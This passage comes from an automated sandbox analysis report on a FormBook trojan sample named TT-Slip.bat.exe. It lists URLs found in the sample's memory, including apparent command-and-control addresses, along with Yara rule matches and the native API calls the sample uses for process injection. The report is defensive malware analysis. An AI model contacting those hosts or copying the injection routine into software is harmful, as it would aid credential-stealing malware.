0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }

Source: compact.exe, 00000011.00000002.4516014437.000000000405A000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000359A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://klimkina.pro/4mpz/?I2ID3h=Y
Source: compact.exe, 00000011.00000002.4516014437.0000000004834000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: TT-Slip.bat.exe, 00000000.00000002.2098433480.0000000002596000.00000004.00000800.00020000.00000000.sdmp, IiIseKTckjhZgQ.exe, 0000000A.00000002.2300572869.000000000336E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: ISsofSsdrAsp.exe, 00000012.00000002.4517126416.000000000517F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.leadchanges.info
Source: ISsofSsdrAsp.exe, 00000012.00000002.4517126416.000000000517F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.leadchanges.info/mjuo/
Source: compact.exe, 00000011.00000002.4516014437.00000000049C6000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003F06000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: compact.exe, 00000011.00000002.4516014437.0000000005332000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000004872000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: compact.exe, 00000011.00000002.4516014437.0000000005332000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000004872000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css
Source: compact.exe, 00000011.00000002.4516014437.00000000046A2000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003BE2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fburl.com
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Abel:400%7CMaven
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4516014437.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000043BC000.00000004.00000001.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: compact.exe, 00000011.00000002.4514474078.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: compact.exe, 00000011.00000002.4514474078.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: compact.exe, 00000011.00000003.2600390961.0000000007ACE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://niteothemes.com
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://optimize.google.com
Source: ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com/wp-admin/admin-ajax.php
Source: ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://td.doubleclick.net
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://wordpress.org/plugins/cmp-coming-soon-maintenance/
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: compact.exe, 00000011.00000002.4516014437.0000000003D36000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003276000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2708902646.0000000007526000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywY
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: compact.exe, 00000011.00000003.2603717009.0000000007B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleanalytics.com
Source: compact.exe, 00000011.00000002.4516014437.000000000437E000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleoptimize.com
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: compact.exe, 00000011.00000002.4516014437.0000000003EC8000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003408000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: compact.exe, 00000011.00000002.4516014437.0000000004CEA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000011.00000002.4517824731.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000422A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: compact.exe, 00000011.00000002.4516014437.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.000000000372C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://youtu.be/uO1hXLmT2j4
Source: compact.exe, 00000011.00000002.4516014437.0000000004834000.00000004.10000000.00040000.00000000.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4515468703.0000000003D74000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0042B543 NtClose,	9_2_0042B543
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D35C0 NtCreateMutant,LdrInitializeThunk,	9_2_016D35C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2B60 NtClose,LdrInitializeThunk,	9_2_016D2B60
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_016D2DF0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_016D2C70
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D3010 NtOpenDirectoryObject,	9_2_016D3010
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D3090 NtSetValueKey,	9_2_016D3090
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D4340 NtSetContextThread,	9_2_016D4340
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D4650 NtSuspendThread,	9_2_016D4650
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D39B0 NtGetContextThread,	9_2_016D39B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2BE0 NtQueryValueKey,	9_2_016D2BE0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2BF0 NtAllocateVirtualMemory,	9_2_016D2BF0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2BA0 NtEnumerateValueKey,	9_2_016D2BA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2B80 NtQueryInformationFile,	9_2_016D2B80
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2AF0 NtWriteFile,	9_2_016D2AF0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2AD0 NtReadFile,	9_2_016D2AD0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2AB0 NtWaitForSingleObject,	9_2_016D2AB0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D3D70 NtOpenThread,	9_2_016D3D70
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2D30 NtUnmapViewOfSection,	9_2_016D2D30
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2D00 NtSetInformationFile,	9_2_016D2D00
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2D10 NtMapViewOfSection,	9_2_016D2D10
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D3D10 NtOpenProcessToken,	9_2_016D3D10
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2DD0 NtDelayExecution,	9_2_016D2DD0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2DB0 NtEnumerateKey,	9_2_016D2DB0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2C60 NtCreateKey,	9_2_016D2C60
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2C00 NtQueryInformationProcess,	9_2_016D2C00
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2CF0 NtOpenProcess,	9_2_016D2CF0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2CC0 NtQueryVirtualMemory,	9_2_016D2CC0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2CA0 NtQueryInformationToken,	9_2_016D2CA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2F60 NtCreateProcessEx,	9_2_016D2F60
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2F30 NtCreateSection,	9_2_016D2F30
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2FE0 NtCreateFile,	9_2_016D2FE0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2FA0 NtQuerySection,	9_2_016D2FA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2FB0 NtResumeThread,	9_2_016D2FB0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2F90 NtProtectVirtualMemory,	9_2_016D2F90
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2E30 NtWriteVirtualMemory,	9_2_016D2E30
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2EE0 NtQueueApcThread,	9_2_016D2EE0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2EA0 NtAdjustPrivilegesToken,	9_2_016D2EA0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D2E80 NtReadVirtualMemory,	9_2_016D2E80

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_00B0D4FC	0_2_00B0D4FC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B3B728	0_2_06B3B728
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B34740	0_2_06B34740
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 0_2_06B32C30	0_2_06B32C30
